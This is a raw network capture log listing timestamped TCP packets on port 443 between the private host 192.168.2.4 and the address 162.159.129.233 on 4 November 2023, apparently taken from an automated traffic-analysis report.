                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.705969095 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.705985069 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.706017971 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.707010984 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.707027912 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.707086086 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.707092047 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.707124949 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.708786964 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.708811998 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.708849907 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.708857059 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.708879948 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.708898067 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.710597038 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.710614920 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.710664988 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.710670948 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.710732937 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.712301016 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.712318897 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.712369919 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.712376118 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.712408066 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.713830948 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.713848114 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.713896990 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.713902950 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.713982105 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.715392113 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.715416908 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.715464115 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.715471983 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.715517044 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.717098951 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.717128992 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.717154980 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.717160940 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.717216969 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.717222929 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.718887091 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.718909979 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.718978882 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.718986988 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.719022036 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.720289946 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.720307112 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.720354080 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.720361948 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.720403910 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.721967936 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.721986055 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.722048044 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.722054005 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.722093105 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.723781109 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.723802090 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.723843098 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.723850012 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.723872900 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.723891973 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.725512028 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.725529909 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.725600004 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.725609064 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.725651026 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.727349997 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.727368116 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.727427959 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.727435112 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.727478027 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.728545904 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.728560925 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.728646040 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.728652954 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.728691101 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.730334997 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.730350971 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.730468988 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.730477095 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.730510950 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.732206106 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.732225895 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.732295990 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.732304096 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.732333899 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.734026909 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.734046936 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.734080076 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.734085083 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.734102964 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.734127998 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.734899044 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.734920979 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.734972954 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.734980106 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.735013962 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.736768007 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.736783028 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.736840963 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.736849070 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.736898899 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.738766909 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.738782883 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.738831043 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.738838911 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.738873959 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.740492105 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.740509033 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.740562916 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.740571022 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.740609884 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.742276907 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.742292881 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.742355108 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.742362022 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.742398977 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.743304014 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.743325949 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.743356943 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.743362904 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.743386030 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.743402958 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.745290041 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.745325089 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.745352983 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.745359898 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.745379925 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.745409012 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.747077942 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.747102976 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.747150898 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.747158051 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.747179985 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.747209072 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.748893023 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.748918056 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.748959064 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.748966932 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.748991966 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.749011993 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.749964952 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.749979019 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.750034094 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.750041008 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.750075102 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.751724958 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.751743078 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.751794100 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.751801968 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.751837969 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.798825026 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.798844099 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.798902988 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.798930883 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.798989058 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.800695896 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.800712109 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.800762892 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.800771952 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.800782919 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.800808907 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.802463055 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.802478075 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.802536011 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.802544117 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.802581072 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.803890944 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.803924084 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.803957939 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.803965092 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.803994894 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.804009914 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.805573940 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.805596113 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.805628061 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.805635929 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.805680037 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.805680037 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.807171106 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.807194948 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.807262897 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.807270050 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.807313919 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.808645964 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.808664083 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.808718920 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.808727026 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.808768988 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.811059952 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.811075926 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.811122894 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.811129093 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.811156988 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.811172009 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.812810898 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.812827110 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.812885046 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.812892914 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.812936068 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.814775944 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.814795017 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.814843893 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.814853907 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.814902067 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.816380978 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.816409111 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.816452026 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.816457987 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.816481113 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.816504955 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.817648888 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.817671061 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.817728043 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.817735910 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.817759991 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.817778111 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.819401026 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.819416046 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.819459915 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.819467068 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.819485903 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.819499016 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.820657015 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.820674896 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.820724964 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.820734024 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.820782900 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.822251081 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.822273016 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.822345018 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.822355032 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.822396994 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.823880911 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.823899984 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.823940992 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.823950052 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.823982954 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.825861931 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.825877905 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.825932980 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.825944901 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.825980902 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.827472925 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.827487946 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.827534914 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.827543974 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.827578068 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.828721046 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.828746080 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.828798056 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.828807116 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.828846931 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.829015017 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.829096079 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.831334114 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.831362009 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.831399918 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.831412077 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.831423044 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.831449986 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.832566977 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.832585096 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.832623005 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.832631111 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.832653999 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.832669020 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.835110903 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.835129023 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.835164070 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.835170031 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.835191965 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.835206032 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.836886883 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.836909056 CET44349738162.159.129.233192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.836941004 CET49738443192.168.2.4162.159.129.233
                                                                                                                                                                                                                            Nov 4, 2023 01:35:23.836947918 CET44349738162.159.129.233192.168.2.4
